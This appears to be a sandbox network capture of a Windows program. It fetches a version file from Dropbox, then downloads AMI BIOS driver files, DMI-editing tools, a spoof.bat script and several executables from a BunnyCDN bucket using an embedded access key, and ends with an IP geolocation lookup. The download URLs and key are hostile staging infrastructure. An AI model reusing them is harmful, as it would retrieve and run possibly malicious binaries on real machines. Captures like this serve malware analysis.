8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

162.125.64.18:443

GET /scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1 HTTP/1.1
Host: www.dropbox.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Content-Security-Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline'
Content-Type: text/html; charset=utf-8
Location: https://ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com/cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1#
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MTY2ODk0MzE0ODQ2OTA4MDE0NDc2ODg5MTcxMjAwNjQ0Mjc0Nzg=; Path=/; Expires=Tue, 13 Nov 2029 00:15:07 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: t=DGAqoY37TBXReIsRKevkRXSa; Path=/; Domain=dropbox.com; Expires=Fri, 14 Nov 2025 00:15:07 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: __Host-js_csrf=DGAqoY37TBXReIsRKevkRXSa; Path=/; Expires=Fri, 14 Nov 2025 00:15:07 GMT; Secure; SameSite=None
Set-Cookie: __Host-ss=GXuQu6l5sc; Path=/; Expires=Fri, 14 Nov 2025 00:15:07 GMT; HttpOnly; Secure; SameSite=Strict
Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 13 Nov 2029 00:15:07 GMT
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Length: 17
Date: Thu, 14 Nov 2024 00:15:07 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server: envoy
Cache-Control: no-cache, no-store
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: be6e8d9ce9104a44b2a49e0c59a6a2f6

8.8.8.8:53

8.8.8.8:53

162.125.64.15:443

GET /cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1 HTTP/1.1
Host: ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/binary
Accept-Ranges: bytes
Cache-Control: max-age=60
Content-Disposition: attachment; filename="version.json"; filename*=UTF-8''version.json
Content-Security-Policy: sandbox
Etag: 1725398947624654d
Pragma: public
Referrer-Policy: no-referrer
Vary: Origin
X-Content-Security-Policy: sandbox
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex, nofollow, noimageindex
X-Server-Response-Time: 273
X-Webkit-Csp: sandbox
Date: Thu, 14 Nov 2024 00:15:08 GMT
Server: envoy
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 26
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 547cf57dbfab4a82ab24eb6ebe06a637

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

142.250.187.206:443

GET /@ripple9 HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

8.8.8.8:53

142.250.179.238:443

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2F%40ripple9%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: SOCS=CAAaBgiA-9S5Bg
cookie: YSC=Do4wY3o5ENo
cookie: __Secure-YEC=CgtBZS1qa0kteGw0QSiYgtW5BjIKCgJHQhIEGgAgIw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgIw%3D%3D

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

216.58.201.100:443

GET /favicon.ico HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://consent.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

109.61.89.55:443

GET /spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:39 GMT
Content-Type: application/octet-stream
Content-Length: 37040
Connection: keep-alive
Content-Disposition: attachment; filename=amigendrv64.sys
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
ETag: "66d2133c-90b0"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:39 GMT
Content-Type: application/octet-stream
Content-Length: 19432
Connection: keep-alive
Content-Disposition: attachment; filename=amifldrv64.sys
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
ETag: "66d2133c-4be8"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:40 GMT
Content-Type: application/octet-stream
Content-Length: 233640
Connection: keep-alive
Content-Disposition: attachment; filename=volumeid.EXE
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:15 GMT
ETag: "66d2133b-390a8"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:40 GMT
Content-Type: application/octet-stream
Content-Length: 169648
Connection: keep-alive
Content-Disposition: attachment; filename=volumeid64.EXE
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
ETag: "66d2133c-296b0"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:40 GMT
Content-Type: application/octet-stream
Content-Length: 5010465
Connection: keep-alive
Content-Disposition: attachment; filename=randomizer.EXE
Pragma: no-cache
Last-Modified: Mon, 02 Sep 2024 15:39:33 GMT
ETag: "66d5dc35-4c7421"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:41 GMT
Content-Type: application/octet-stream
Content-Length: 388720
Connection: keep-alive
Content-Disposition: attachment; filename=AMIDEWINx64.EXE
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
ETag: "66d2133c-5ee70"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:41 GMT
Content-Type: application/octet-stream
Content-Length: 1908
Connection: keep-alive
Content-Disposition: attachment; filename=spoof.bat
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:14 GMT
ETag: "66d2133a-774"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:41 GMT
Content-Type: application/octet-stream
Content-Length: 48640
Connection: keep-alive
Content-Disposition: attachment; filename=21902902190121290mc.exe
Pragma: no-cache
Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
ETag: "66d2133c-be00"
Accept-Ranges: bytes

109.61.89.55:443

GET /spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
User-Agent: Mozilla/5.0
Host: storage.bunnycdn.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 00:15:41 GMT
Content-Type: application/octet-stream
Content-Length: 12177651
Connection: keep-alive
Content-Disposition: attachment; filename=mac.exe
Pragma: no-cache
Last-Modified: Mon, 02 Sep 2024 15:37:35 GMT
ETag: "66d5dbbf-b9d0f3"
Accept-Ranges: bytes

8.8.8.8:53

8.8.8.8:53

208.95.112.1:80

GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.10.5

HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 00:15:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53